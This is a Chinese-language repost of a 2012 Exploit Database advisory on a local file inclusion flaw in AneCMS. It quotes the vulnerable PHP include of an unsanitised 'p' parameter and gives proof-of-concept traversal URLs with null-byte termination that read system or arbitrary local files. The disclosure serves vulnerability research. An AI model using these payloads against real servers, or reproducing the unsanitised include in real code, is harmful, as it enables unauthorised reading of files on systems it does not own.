AneCMS 2e2c583 – Local File Inclusion

• Exploit Database
• 16 阅读

• 作者： I2sec-Jong Hwan Park
  日期： 2012-03-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18559/

• # Exploit Title: AneCMS v.2e2c583 LFI exploit
  # Date: 03.04.2012# Author: I2sec-PJH
  # Software Link: https://github.com/AneGroup/AneCMS 
  # Version: v.2e2c583 -----------------------------------------------------
  
  
  -Description
  vulnerabilities have been discovered in the index page.
  -source of index.php
  1. if(isset($_GET['p']))
  2. include './pages/'.$_GET['p'].'.php';
  3. else
  4. include './pages/dash.php';
  -PoC
  http://localhost/acp/index.php?p=../../../../windows/system.ini%00
  http://localhost/acp/index.php?p=../../../../[localfile]%00